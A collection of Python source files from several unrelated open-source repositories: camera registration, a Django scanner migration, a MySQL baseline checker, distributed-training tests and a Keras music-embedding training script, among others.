:param long_click_time: 长按时间,以毫秒为单位
:return:
"""
sx, sy = self._to_screen_pos((px, py))
Mouse.click(sx, sy)
time.sleep(long_click_time/1000)
# percent_x, percent_y = self.pixel_to_percent(px, py)
# self.mouse.longclick(long_click_time / 1000, (percent_x, percent_y))
def MouseDrag(self, from_x, from_y, to_x, to_y):
""" 从起点(from_x, from_y)拖动到(to_x, to_y)
:param from_x:
:param from_y:
:param to_x:
:param to_y:
:return:
"""
sfx, sfy = self._to_screen_pos((from_x, from_y))
stx, sty = self._to_screen_pos((to_x, to_y))
Mouse.drag(sfx, sfy, stx, sty)
|
examples/calibration_registration/register.py
|
seanyen/Azure-Kinect-Sensor-SDK
| 1,120 |
62400
|
"""
An app script to run registration between two cameras from the command line.
Copyright (C) Microsoft Corporation. All rights reserved.
"""
# Standard Libraries.
import argparse
# Calibration tools.
from camera_tools import register
# ------------------------------------------------------------------------------
def parse_args():
"""
Get arguments for running the registration.
Returns:
args -- Return a list of command line arguments for running registration.
"""
parser = argparse.ArgumentParser(description="Get extrinsics for cameras.")
parser.add_argument("-ia", "--img-a", required=True,
help="Full path to image from camera A.")
parser.add_argument("-ib", "--img-b", required=True,
help="Full path to image from camera B.")
parser.add_argument("-t", "--template", required=True,
help="Full path to Charuco board template file.")
parser.add_argument("-ca", "--calib-a", required=True,
help="Full path to calibration file from camera A.")
parser.add_argument("-cb", "--calib-b", required=True,
help="Full path to calibration file from camera B.")
parser.add_argument("-o", "--out-dir", required=True,
help="Output directory for full calibration blob.")
cmd_args = parser.parse_args()
return cmd_args
if __name__ == "__main__":
args = parse_args()
rotation, translation, rms1_pixels, rms1_rad, rms2_pixels, rms2_rad = \
register(args.img_a,
args.img_b,
args.template,
args.calib_a,
args.calib_b,
args.out_dir)
|
VulnerableScan/migrations/0004_remove_exploitregister_file_object_and_more.py
|
b0bac/ApolloScanner
| 289 |
62433
|
# Generated by Django 4.0.1 on 2022-03-10 17:36
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('Assets', '0003_alter_assetlist_timestamp_alter_assettask_timestamp'),
('VulnerableScan', '0003_alter_exploitregister_timestamp_and_more'),
]
operations = [
migrations.RemoveField(
model_name='exploitregister',
name='file_object',
),
migrations.AddField(
model_name='exploitregister',
name='code',
field=models.TextField(db_column='code', null=True, verbose_name='负载代码'),
),
migrations.AddField(
model_name='exploitregister',
name='debug_info',
field=models.TextField(blank=True, db_column='debug_info', default='', null=True, verbose_name='调试信息'),
),
migrations.AddField(
model_name='exploitregister',
name='function_name',
field=models.CharField(db_column='function_name', default='', max_length=100, verbose_name='函数名称'),
),
migrations.AddField(
model_name='exploitregister',
name='target',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='Assets.assetlist', verbose_name='调试目标'),
),
migrations.AlterField(
model_name='exploitregister',
name='description',
field=models.TextField(db_column='description', verbose_name='负载描述'),
),
]
|
tests/framework/CodeInterfaceTests/RAVEN/ReturnDatabase/innerRunDir/nd_data.py
|
rinelson456/raven
| 159 |
62469
|
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
def run(raven, inputs):
"""
Run method.
@ In, raven, object, RAVEN object
@ In, inputs, dict, input dictionary
@ Out, None
"""
# inputs: a, b, c
# outputs: d, e, f
# indices: d(), e(x), f(x, y)
a = raven.a
b = raven.b
c = raven.c
nx = 5
ny = 3
x = np.arange(nx) * 0.1
y = np.arange(ny) * 10
d = a*a
e = x * b
f = np.arange(nx*ny).reshape(nx, ny) * c
# save
raven.x = x
raven.y = y
raven.d = d
raven.e = e
raven.f = f
raven._indexMap = {'e': ['x'],
'f': ['x', 'y']
}
|
db_bascline.py
|
wstart/DB_BaseLine
| 152 |
62546
|
<reponame>wstart/DB_BaseLine
# -*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
from script.mysql_baseline import *
from loghandle import *
import getopt
if __name__ == "__main__":
bannber = '''
____ ____ ____ _ _ {''' + db_baseline_basic.getVersion() + '''}
| _ \| __ )| __ ) __ _ ___ ___| (_)_ __ ___
| | | | _ \| _ \ / _` / __|/ _ \ | | '_ \ / _ \\
| |_| | |_) | |_) | (_| \__ \ __/ | | | | | __/
|____/|____/|____/ \__,_|___/\___|_|_|_| |_|\___|
(https://github.com/wstart/DB_BaseLine)
--------------------------------------------------'''
supperdb = ["mysql"]
DBnames = ",".join(supperdb)
small_helper='''
Usage: python db_baseline.py [options]
python db_baseline.py -h for more infomation
'''
helper = '''
Usage: python db_baseline.py [options]
[Options]:
-v ,--version show version
-h,--help show help
-D,--database check DataBase type,default is mysql
support Database list: ''' + DBnames + '''
-H,--host host,Default:127.0.0.1
if host is not 127.0.0.1 or localhost only check command
-P,--database-port database port,Default:Database Default port
it will set by check script
-u,--database-user database rootuser,default:root
-p,--database-password database password,default:root
'''
plog = loghandle.getLogEntity()
plog.output(bannber, "INFO", showtime=False, showlevel=False)
runconfig = {
"database": "",
"host": "",
"database_port": "",
"database_user": "",
"database_password": ""
}
try:
opts, args = getopt.getopt(sys.argv[1:], "vhD:H:P:u:p:",
["version", "help", "database=", "host=", "database-port=", "database-user=",
"database-password="])
checkscript = ""
if len(opts) == 0:
print small_helper
exit()
for o, a in opts:
if o in ("-v", "--version"):
print("DB_BASELINE : " + db_baseline_basic.getVersion())
sys.exit()
elif o in ("-h", "--help"):
print helper
sys.exit()
elif o in ("-D", "--database"):
runconfig["database"] = a
elif o in ("-H", "--host"):
runconfig["host"] = a
elif o in ("-P", "--database-port"):
runconfig["database_port"] = a
elif o in ("-U", "--database-user"):
runconfig["database_user"] = a
elif o in ("-p", "--database-password"):
runconfig["database_password"] = a
if runconfig["database"] == "mysql":
checkscript = mysql_baseline(runconfig)
if checkscript != "":
result = checkscript.runtest()
else:
plog.output("No match DataBase Type","ERROR")
print small_helper
plog.output("DBBaseline exit()")
except getopt.GetoptError:
print helper
|
data-processing/scripts/fetch_arxiv_sources.py
|
hhchi13/scholarphi
| 285 |
62553
|
<filename>data-processing/scripts/fetch_arxiv_sources.py
import argparse
import os
from common import directories
from common.fetch_arxiv import fetch_from_arxiv
from common.unpack import unpack, unpack_archive
if __name__ == "__main__":
parser = argparse.ArgumentParser(
"Fetch and unpack sources for a single arXiv paper."
)
parser.add_argument(
"arxiv_id",
help="The arXiv ID for a paper. May include version number (i.e., 'v1', 'v2', etc.)",
)
parser.add_argument(
"--output-dir",
help=(
"Directory into which the arXiv sources will be fetched. The fetched sources will "
+ "be saved in a subfolder of the output folder with its name as the arXiv ID "
+ "(i.e., 'output_dir/<arxiv_id>/')."
),
default="tmp",
)
args = parser.parse_args()
arxiv_id = args.arxiv_id
output_dir = args.output_dir
archives_dir = os.path.join(output_dir, "archives")
archive_path = os.path.join(archives_dir, directories.escape_slashes(arxiv_id))
sources_dir = os.path.join(output_dir, directories.escape_slashes(arxiv_id))
if not os.path.exists(archives_dir):
print(f"Creating directory to hold source archives at {archives_dir}.")
os.makedirs(archives_dir)
print(
f"Downloading archive of source files from arXiv for paper {arxiv_id}...",
end="",
)
fetch_from_arxiv(arxiv_id, dest=archive_path)
print("done.")
if not os.path.exists(sources_dir):
print(f"Creating directory to hold unpacked sources at {sources_dir}.")
os.makedirs(sources_dir)
print(f"Unpacking sources for paper {arxiv_id} into {sources_dir}.")
unpack_archive(archive_path, sources_dir)
|
src/gfl/shell/shell.py
|
mingt2019/GFL
| 123 |
62578
|
<gh_stars>100-1000
import os
import sys
import requests
from gfl.conf import GflConf
class Shell(object):
__host = "127.0.0.1"
__port = 9434
@classmethod
def welcome(cls, **kwargs):
print("------- GFL -------")
print("%-20s:%s" % ("pid", str(os.getpid())))
@classmethod
def attach(cls, host, port):
cls.welcome()
cls.startup(host=host, port=port)
pass
@classmethod
def startup(cls, **kwargs):
cls.__host = kwargs.pop("host", "127.0.0.1")
cls.__port = kwargs.pop("port", GflConf.get_property("api.http.port"))
while True:
cmd = input("> ")
if "EXIT".lower() == cmd.lower():
cls.exit()
break
if cmd.startswith("SHOWCONF"):
key = cmd[9:].strip()
print(GflConf.get_property(key))
@classmethod
def exit(cls, **kwargs):
req_url = "http://%s:%s/shutdown" % (cls.__host, cls.__port)
resp = requests.post(req_url)
try:
data = resp.json()
if data["code"] == 0:
return True
else:
return False
except:
return False
|
tests/ignite/distributed/utils/test_serial.py
|
Juddd/ignite
| 4,119 |
62607
|
import torch
import ignite.distributed as idist
from tests.ignite.distributed.utils import (
_sanity_check,
_test_distrib__get_max_length,
_test_distrib_all_gather,
_test_distrib_all_reduce,
_test_distrib_barrier,
_test_distrib_broadcast,
_test_sync,
)
def test_no_distrib(capsys):
assert idist.backend() is None
if torch.cuda.is_available():
assert idist.device().type == "cuda"
else:
assert idist.device().type == "cpu"
assert idist.get_rank() == 0
assert idist.get_world_size() == 1
assert idist.get_local_rank() == 0
assert idist.model_name() == "serial"
from ignite.distributed.utils import _model, _SerialModel
_sanity_check()
assert isinstance(_model, _SerialModel)
idist.show_config()
captured = capsys.readouterr()
out = captured.err.split("\r")
out = list(map(lambda x: x.strip(), out))
out = list(filter(None, out))
assert "ignite.distributed.utils INFO: distributed configuration: serial" in out[-1]
assert "ignite.distributed.utils INFO: backend: None" in out[-1]
if torch.cuda.is_available():
assert "ignite.distributed.utils INFO: device: cuda" in out[-1]
else:
assert "ignite.distributed.utils INFO: device: cpu" in out[-1]
assert "ignite.distributed.utils INFO: rank: 0" in out[-1]
assert "ignite.distributed.utils INFO: local rank: 0" in out[-1]
assert "ignite.distributed.utils INFO: world size: 1" in out[-1]
def test_sync_no_dist():
from ignite.distributed.comp_models import _SerialModel
_test_sync(_SerialModel)
def test_idist_methods_no_dist():
assert idist.get_world_size() < 2
assert idist.backend() is None, f"{idist.backend()}"
def test_idist__model_methods_no_dist():
_test_distrib__get_max_length("cpu")
if torch.cuda.device_count() > 1:
_test_distrib__get_max_length("cuda")
def test_idist_collective_ops_no_dist():
_test_distrib_all_reduce("cpu")
_test_distrib_all_gather("cpu")
_test_distrib_barrier("cpu")
_test_distrib_broadcast("cpu")
if torch.cuda.device_count() > 1:
_test_distrib_all_reduce("cuda")
_test_distrib_all_gather("cuda")
_test_distrib_barrier("cuda")
_test_distrib_broadcast("cuda")
|
src/train.py
|
anirbanlahiri2017/Tartarus
| 104 |
62624
|
from __future__ import print_function
import argparse
from collections import OrderedDict
import json
import os
import logging
from keras.callbacks import EarlyStopping
from sklearn.preprocessing import normalize
from sklearn.metrics import roc_curve, auc, roc_auc_score, precision_score, recall_score, f1_score, accuracy_score, average_precision_score
from scipy.sparse import csr_matrix
from keras.utils.io_utils import HDF5Matrix
#from keras.utils.visualize_util import plot
from keras.optimizers import SGD, Adam
from sklearn.metrics import r2_score
import numpy as np
import theano.tensor as tt
import pandas as pd
import random
import common
import models
from predict import obtain_predictions
from eval import do_eval
import h5py
class Config(object):
"""Configuration for the training process."""
def __init__(self, params, normalize=False, whiten=True):
self.model_id = common.get_next_model_id()
self.norm = normalize
self.whiten = whiten
self.x_path = '%s_%sx%s' % (params['dataset']['dataset'],params['dataset']['npatches'],params['dataset']['window'])
self.y_path = '%s_%s_%s' % (params['dataset']['fact'],params['dataset']['dim'],params['dataset']['dataset'])
self.dataset_settings = params['dataset']
self.training_params = params['training']
self.model_arch = params['cnn']
self.predicting_params = params['predicting']
def get_dict(self):
object_dict = self.__dict__
first_key = "model_id"
conf_dict = OrderedDict({first_key: object_dict[first_key]})
conf_dict.update(object_dict)
return conf_dict
def _squared_magnitude(x):
return tt.sqr(x).sum(axis=-1)
def _magnitude(x):
return tt.sqrt(tt.maximum(_squared_magnitude(x), np.finfo(x.dtype).tiny))
def cosine(x, y):
return tt.clip((1 - (x * y).sum(axis=-1) /
(_magnitude(x) * _magnitude(y))) / 2, 0, 1)
def load_sparse_csr(filename):
loader = np.load(filename)
return csr_matrix(( loader['data'], loader['indices'], loader['indptr']),
shape = loader['shape'])
def build_model(config):
"""Builds the cnn."""
params = config.model_arch
get_model = getattr(models, 'get_model_'+str(params['architecture']))
model = get_model(params)
#model = model_kenun.build_convnet_model(params)
# Learning setup
t_params = config.training_params
sgd = SGD(lr=t_params["learning_rate"], decay=t_params["decay"],
momentum=t_params["momentum"], nesterov=t_params["nesterov"])
adam = Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08)
optimizer = eval(t_params['optimizer'])
metrics = ['mean_squared_error']
if config.model_arch["final_activation"] == 'softmax':
metrics.append('categorical_accuracy')
if t_params['loss_func'] == 'cosine':
loss_func = eval(t_params['loss_func'])
else:
loss_func = t_params['loss_func']
model.compile(loss=loss_func, optimizer=optimizer,metrics=metrics)
return model
def load_data_preprocesed(params, X_path, Y_path, dataset, val_percent, test_percent, n_samples, with_metadata=False, only_metadata=False, metadata_source='rovi'):
factors = np.load(common.DATASETS_DIR+'/y_train_'+Y_path+'.npy') # OJO remove S
index_factors = open(common.DATASETS_DIR+'/items_index_train_'+dataset+'.tsv').read().splitlines()
if not only_metadata:
all_X = np.load(common.TRAINDATA_DIR+'/X_train_'+X_path+'.npy')
index_train = open(common.TRAINDATA_DIR+'/index_train_%s.tsv' % (X_path)).read().splitlines()
all_Y = np.zeros((len(index_train),factors.shape[1]))
index_factors_inv = dict()
for i,item in enumerate(index_factors):
index_factors_inv[item] = i
for i,item in enumerate(index_train):
all_Y[i,:] = factors[index_factors_inv[item]]
else:
all_Y = factors
if with_metadata:
if 'w2v' in metadata_source:
all_X_meta = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (metadata_source,dataset))[:,:int(params['cnn']['sequence_length'])]
elif 'model' in metadata_source or not params['dataset']['sparse']:
all_X_meta = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (metadata_source,dataset))
else:
all_X_meta = load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz' % (metadata_source,dataset)).todense()
all_X_in_meta = all_X = all_X_meta
print(all_X.shape)
print(all_Y.shape)
if n_samples != 'all':
n_samples = int(n_samples)
all_X = all_X[:n_samples]
all_Y = all_Y[:n_samples]
if with_metadata:
all_X_in_meta = all_X_in_meta[:n_samples]
if params['training']['normalize_y'] == True:
normalize(all_Y,copy=False)
if params['training']["val_from_file"]:
Y_val = np.load(common.DATASETS_DIR+'/y_val_'+Y_path+'.npy')
Y_test = np.load(common.DATASETS_DIR+'/y_test_'+Y_path+'.npy') #!!! OJO remove S from trainS
if params['dataset']['sparse']:
X_val = load_sparse_csr(common.TRAINDATA_DIR+'/X_val_%s_%s.npz' % (metadata_source,dataset)).todense()
X_test = load_sparse_csr(common.TRAINDATA_DIR+'/X_test_%s_%s.npz' % (metadata_source,dataset)).todense()
else:
X_val = np.load(common.TRAINDATA_DIR+'/X_val_%s_%s.npy' % (metadata_source,dataset))
X_test = np.load(common.TRAINDATA_DIR+'/X_test_%s_%s.npy' % (metadata_source,dataset))
X_train = all_X
Y_train = all_Y
else:
N = all_Y.shape[0]
train_percent = 1 - val_percent - test_percent
N_train = int(train_percent * N)
N_val = int(val_percent * N)
logging.debug("Training data points: %d" % N_train)
logging.debug("Validation data points: %d" % N_val)
logging.debug("Test data points: %d" % (N - N_train - N_val))
if not only_metadata:
# Slice data
X_train = all_X[:N_train]
X_val = all_X[N_train:N_train + N_val]
X_test = all_X[N_train + N_val:]
Y_train = all_Y[:N_train]
Y_val = all_Y[N_train:N_train + N_val]
Y_test = all_Y[N_train + N_val:]
if with_metadata:
if only_metadata:
X_train = all_X_in_meta[:N_train]
X_val = all_X_in_meta[N_train:N_train + N_val]
X_test = all_X_in_meta[N_train + N_val:]
else:
X_train = [X_train,all_X_in_meta[:N_train]]
X_val = [X_val,all_X_in_meta[N_train:N_train + N_val]]
X_test = [X_test,all_X_in_meta[N_train + N_val:]]
return X_train, Y_train, X_val, Y_val, X_test, Y_test
def load_data_hf5(params,val_percent, test_percent):
hdf5_file = common.PATCHES_DIR+"/patches_train_%s_%s.hdf5" % (params['dataset']['dataset'],params['dataset']['window'])
f = h5py.File(hdf5_file,"r")
N = f["targets"].shape[0]
f.close()
train_percent = 1 - val_percent - test_percent
N_train = int(train_percent * N)
N_val = int(val_percent * N)
X_train = HDF5Matrix(hdf5_file, 'features', start=0, end=N_train)
Y_train = HDF5Matrix(hdf5_file, 'targets', start=0, end=N_train)
X_val = HDF5Matrix(hdf5_file, 'features', start=N_train, end=N_train+N_val)
Y_val = HDF5Matrix(hdf5_file, 'targets', start=N_train, end=N_train+N_val)
X_test = HDF5Matrix(hdf5_file, 'features', start=N_train+N_val, end=N)
Y_test = HDF5Matrix(hdf5_file, 'targets', start=N_train+N_val, end=N)
return X_train, Y_train, X_val, Y_val, X_test, Y_test, N_train
def load_data_hf5_memory(params,val_percent, test_percent, y_path, id2gt, X_meta = None, val_from_file = False):
if val_from_file:
hdf5_file = common.PATCHES_DIR+"/patches_train_%s_%sx%s.hdf5" % (params['dataset']['dataset'],params['dataset']['npatches'],params['dataset']['window'])
f = h5py.File(hdf5_file,"r")
index_train = f["index"][:]
index_train = np.delete(index_train, np.where(index_train == ""))
N_train = index_train.shape[0]
val_hdf5_file = common.PATCHES_DIR+"/patches_val_%s_%sx%s.hdf5" % (params['dataset']['dataset'],params['dataset']['npatches'],params['dataset']['window'])
f_val = h5py.File(val_hdf5_file,"r")
X_val = f_val['features'][:]
#Y_val = f_val['targets'][:]
factors_val = np.load(common.DATASETS_DIR+'/y_val_'+y_path+'.npy')
index_factors_val = open(common.DATASETS_DIR+'/items_index_val_'+params['dataset']['dataset']+'.tsv').read().splitlines()
id2gt_val = dict((index,factor) for (index,factor) in zip(index_factors_val,factors_val))
index_val = [i for i in f_val['index'][:] if i in id2gt_val]
X_val = np.delete(X_val, np.where(index_val == ""), axis=0)
index_val = np.delete(index_val, np.where(index_val == ""))
Y_val = np.asarray([id2gt_val[id] for id in index_val])
test_hdf5_file = common.PATCHES_DIR+"/patches_test_%s_%sx%s.hdf5" % (params['dataset']['dataset'],params['dataset']['npatches'],params['dataset']['window'])
f_test = h5py.File(test_hdf5_file,"r")
X_test = f_test['features'][:]
#Y_test = f_test['targets'][:]
factors_test = np.load(common.DATASETS_DIR+'/y_test_'+y_path+'.npy')
index_factors_test = open(common.DATASETS_DIR+'/items_index_test_'+params['dataset']['dataset']+'.tsv').read().splitlines()
id2gt_test = dict((index,factor) for (index,factor) in zip(index_factors_test,factors_test))
index_test = [i for i in f_test['index'][:] if i in id2gt_test]
X_test = np.delete(X_test, np.where(index_test == ""), axis=0)
index_test = np.delete(index_test, np.where(index_test == ""))
Y_test = np.asarray([id2gt_test[id] for id in index_test])
else:
hdf5_file = common.PATCHES_DIR+"/patches_train_%s_%sx%s.hdf5" % (params['dataset']['dataset'],params['dataset']['npatches'],params['dataset']['window'])
f = h5py.File(hdf5_file,"r")
index_all = f["index"][:]
N = index_all.shape[0]
train_percent = 1 - val_percent - test_percent
N_train = int(train_percent * N)
N_val = int(val_percent * N)
X_val = f['features'][N_train:N_train+N_val]
index_val = f['index'][N_train:N_train+N_val]
X_val = np.delete(X_val, np.where(index_val == ""), axis=0)
index_val = np.delete(index_val, np.where(index_val == ""))
Y_val = np.asarray([id2gt[id] for id in index_val])
X_test = f['features'][N_train+N_val:N]
index_test = f['index'][N_train+N_val:N]
print(index_test.shape)
print(X_test.shape)
X_test = np.delete(X_test, np.where(index_test == ""), axis=0)
index_test = np.delete(index_test, np.where(index_test == ""))
print(index_test.shape)
print(X_test.shape)
Y_test = np.asarray([id2gt[id] for id in index_test])
print(Y_test.shape)
index_train = f['index'][:N_train]
index_train = np.delete(index_train, np.where(index_train == ""))
N_train = index_train.shape[0]
if X_meta != None:
X_val = [X_val,X_meta[N_train:N_train+N_val]]
X_test = [X_test,X_meta[N_train+N_val:N]]
return X_val, Y_val, X_test, Y_test, N_train
def batch_block_generator(params, y_path, N_train, id2gt, X_meta=None,
val_from_file=False):
hdf5_file = common.PATCHES_DIR+"/patches_train_%s_%sx%s.hdf5" % (params['dataset']['dataset'],params['dataset']['npatches'],params['dataset']['window'])
f = h5py.File(hdf5_file,"r")
block_step = 50000
batch_size = params['training']['n_minibatch']
randomize = True
with_meta = False
if X_meta != None:
with_meta = True
while 1:
for i in range(0, N_train, block_step):
x_block = f['features'][i:min(N_train, i+block_step)]
index_block = f['index'][i:min(N_train, i+block_step)]
#y_block = f['targets'][i:min(N_train,i+block_step)]
x_block = np.delete(x_block, np.where(index_block == ""), axis=0)
index_block = np.delete(index_block, np.where(index_block == ""))
y_block = np.asarray([id2gt[id] for id in index_block])
if params['training']['normalize_y']:
normalize(y_block, copy=False)
items_list = range(x_block.shape[0])
if randomize:
random.shuffle(items_list)
for j in range(0, len(items_list), batch_size):
if j+batch_size <= x_block.shape[0]:
items_in_batch = items_list[j:j+batch_size]
x_batch = x_block[items_in_batch]
y_batch = y_block[items_in_batch]
if with_meta:
x_batch = [x_batch, X_meta[items_in_batch]]
yield (x_batch, y_batch)
def process(params,with_predict=True,with_eval=True):
logging.basicConfig(format='%(asctime)s %(message)s', level=logging.DEBUG)
params['cnn']['n_out'] = int(params['dataset']['dim'])
#params['cnn']['n_frames'] = int(params['dataset']['window'] * SR / float(HR))
with_metadata = params['dataset']['with_metadata']
only_metadata = params['dataset']['only_metadata']
metadata_source = params['dataset']['meta-suffix']
if with_metadata:
if 'w2v' in metadata_source:
X_meta = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (metadata_source,params['dataset']['dataset']))[:,:int(params['cnn']['sequence_length'])]
params['cnn']['n_metafeatures'] = len(X_meta[0])
if 'meta-suffix2' in params['dataset']:
X_meta2 = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (params['dataset']['meta-suffix2'],params['dataset']['dataset']))
params['cnn']['n_metafeatures2'] = len(X_meta2[0])
if 'meta-suffix3' in params['dataset']:
X_meta3 = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (params['dataset']['meta-suffix3'],params['dataset']['dataset']))
params['cnn']['n_metafeatures3'] = len(X_meta3[0])
if 'meta-suffix4' in params['dataset']:
X_meta4 = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (params['dataset']['meta-suffix4'],params['dataset']['dataset']))
params['cnn']['n_metafeatures4'] = len(X_meta4[0])
elif 'model' in metadata_source or not params['dataset']['sparse']:
X_meta = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (metadata_source,params['dataset']['dataset']))
params['cnn']['n_metafeatures'] = len(X_meta[0])
if 'meta-suffix2' in params['dataset']:
X_meta2 = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (params['dataset']['meta-suffix2'],params['dataset']['dataset']))
params['cnn']['n_metafeatures2'] = len(X_meta2[0])
if 'meta-suffix3' in params['dataset']:
X_meta3 = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (params['dataset']['meta-suffix3'],params['dataset']['dataset']))
params['cnn']['n_metafeatures3'] = len(X_meta3[0])
if 'meta-suffix4' in params['dataset']:
X_meta4 = np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy' % (params['dataset']['meta-suffix4'],params['dataset']['dataset']))
params['cnn']['n_metafeatures4'] = len(X_meta4[0])
else:
X_meta = load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz' % (metadata_source,params['dataset']['dataset'])).todense()
params['cnn']['n_metafeatures'] = X_meta.shape[1]
if 'meta-suffix2' in params['dataset']:
X_meta2 = load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz' % (params['dataset']['meta-suffix2'],params['dataset']['dataset']))
params['cnn']['n_metafeatures2'] = X_meta2.shape[1]
if 'meta-suffix3' in params['dataset']:
X_meta3 = load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz' % (params['dataset']['meta-suffix3'],params['dataset']['dataset']))
params['cnn']['n_metafeatures3'] = len(X_meta3[0])
if 'meta-suffix4' in params['dataset']:
X_meta4 = load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz' % (params['dataset']['meta-suffix4'],params['dataset']['dataset']))
params['cnn']['n_metafeatures3'] = len(X_meta4[0])
print(X_meta.shape)
else:
X_meta = None
config = Config(params)
model_dir = os.path.join(common.MODELS_DIR, config.model_id)
common.ensure_dir(common.MODELS_DIR)
common.ensure_dir(model_dir)
model_file = os.path.join(model_dir, config.model_id + common.MODEL_EXT)
logging.debug("Building Network...")
#model = build_model(config)
model = build_model(config)
print(model.summary())
#plot(model, to_file='model2.png', show_shapes=True)
trained_model = config.get_dict()
# Save model
#plot(model, to_file=os.path.join(model_dir, config.model_id + PLOT_EXT))
common.save_model(model, model_file)
logging.debug(trained_model["model_id"])
logging.debug("Loading Data...")
with_generator = True
if only_metadata:
X_train, Y_train, X_val, Y_val, X_test, Y_test = \
load_data_preprocesed(params, config.x_path, config.y_path, params['dataset']['dataset'], config.training_params["validation"],
config.training_params["test"], config.dataset_settings["nsamples"], with_metadata, only_metadata, metadata_source)
if 'meta-suffix2' in params['dataset']:
X_train2, Y_train2, X_val2, Y_val2, X_test2, Y_test2 = \
load_data_preprocesed(params, config.x_path, config.y_path, params['dataset']['dataset'], config.training_params["validation"],
config.training_params["test"], config.dataset_settings["nsamples"], with_metadata, only_metadata, params['dataset']['meta-suffix2'])
X_train = [X_train,X_train2]
X_val = [X_val,X_val2]
X_test = [X_test,X_test2]
print("X_train bi", len(X_train))
if 'meta-suffix3' in params['dataset']:
X_train3, Y_train3, X_val3, Y_val3, X_test3, Y_test3 = \
load_data_preprocesed(params, config.x_path, config.y_path, params['dataset']['dataset'], config.training_params["validation"],
config.training_params["test"], config.dataset_settings["nsamples"], with_metadata, only_metadata, params['dataset']['meta-suffix3'])
X_train.append(X_train3)
X_val.append(X_val3)
X_test.append(X_test3)
print("X_train tri", len(X_train))
if 'meta-suffix4' in params['dataset']:
X_train4, Y_train4, X_val4, Y_val4, X_test4, Y_test4 = \
load_data_preprocesed(params, config.x_path, config.y_path, params['dataset']['dataset'], config.training_params["validation"],
config.training_params["test"], config.dataset_settings["nsamples"], with_metadata, only_metadata, params['dataset']['meta-suffix4'])
X_train.append(X_train4)
X_val.append(X_val4)
X_test.append(X_test4)
print("X_train four", len(X_train))
else:
if with_generator:
id2gt = dict()
factors = np.load(common.DATASETS_DIR+'/y_train_'+config.y_path+'.npy')
index_factors = open(common.DATASETS_DIR+'/items_index_train_'+params['dataset']['dataset']+'.tsv').read().splitlines()
id2gt = dict((index,factor) for (index,factor) in zip(index_factors,factors))
X_val, Y_val, X_test, Y_test, N_train = load_data_hf5_memory(params,config.training_params["validation"],config.training_params["test"],config.y_path,id2gt,X_meta,config.training_params["val_from_file"])
if params['dataset']['nsamples'] != 'all':
N_train = min(N_train,params['dataset']['nsamples'])
else:
X_train, Y_train, X_val, Y_val, X_test, Y_test, N_train = load_data_hf5(params,config.training_params["validation"],config.training_params["test"])
trained_model["whiten_scaler"] = common.TRAINDATA_DIR+'/scaler_%s.pk' % config.x_path
logging.debug("Training...")
if config.model_arch["final_activation"] == 'softmax':
monitor_metric = 'val_categorical_accuracy'
else:
monitor_metric = 'val_loss'
early_stopping = EarlyStopping(monitor=monitor_metric, patience=4)
if only_metadata:
epochs = model.fit(X_train, Y_train,
batch_size=config.training_params["n_minibatch"],
#shuffle='batch',
nb_epoch=config.training_params["n_epochs"],
verbose=1, validation_data=(X_val, Y_val),
callbacks=[early_stopping])
else:
if with_generator:
print(N_train)
epochs = model.fit_generator(batch_block_generator(params,config.y_path,N_train,id2gt,X_meta,config.training_params["val_from_file"]),
samples_per_epoch = N_train-(N_train % config.training_params["n_minibatch"]),
nb_epoch = config.training_params["n_epochs"],
verbose=1,
validation_data = (X_val, Y_val),
callbacks=[early_stopping])
else:
epochs = model.fit(X_train, Y_train,
batch_size=config.training_params["n_minibatch"],
shuffle='batch',
nb_epoch=config.training_params["n_epochs"],
verbose=1,
validation_data=(X_val, Y_val),
callbacks=[early_stopping])
model.save_weights(os.path.join(model_dir, config.model_id + common.WEIGHTS_EXT))
logging.debug("Saving trained model %s in %s..." %
(trained_model["model_id"], common.DEFAULT_TRAINED_MODELS_FILE))
common.save_trained_model(common.DEFAULT_TRAINED_MODELS_FILE, trained_model)
logging.debug("Evaluating...")
print(X_test[0].shape,X_test[1].shape)
preds=model.predict(X_test)
print(preds.shape)
if params["dataset"]["evaluation"] in ['binary','multiclass']:
y_pred = (preds > 0.5).astype('int32')
acc = accuracy_score(Y_test,y_pred)
prec = precision_score(Y_test,y_pred,average='macro')
recall = recall_score(Y_test,y_pred,average='macro')
f1 = f1_score(Y_test,y_pred,average='macro')
print('Accuracy', acc)
print("%.3f\t%.3f\t%.3f" % (prec,recall,f1))
if params["dataset"]["fact"] == 'class':
good_classes = np.nonzero(Y_test.sum(0))[0]
print(Y_test.shape,preds.shape)
#roc_auc=roc_auc_score(Y_test[:,good_classes],preds[:,good_classes])
#logging.debug('ROC-AUC '+str(roc_auc))
#pr_auc = average_precision_score(Y_test[:,good_classes],preds[:,good_classes])
#print('PR-AUC',pr_auc)
#r2 = roc_auc
elif params["dataset"]["evaluation"] not in ['binary','multiclass','multilabel']:
r2s = []
for i,pred in enumerate(preds):
r2 = r2_score(Y_test[i],pred)
r2s.append(r2)
r2 = np.asarray(r2s).mean()
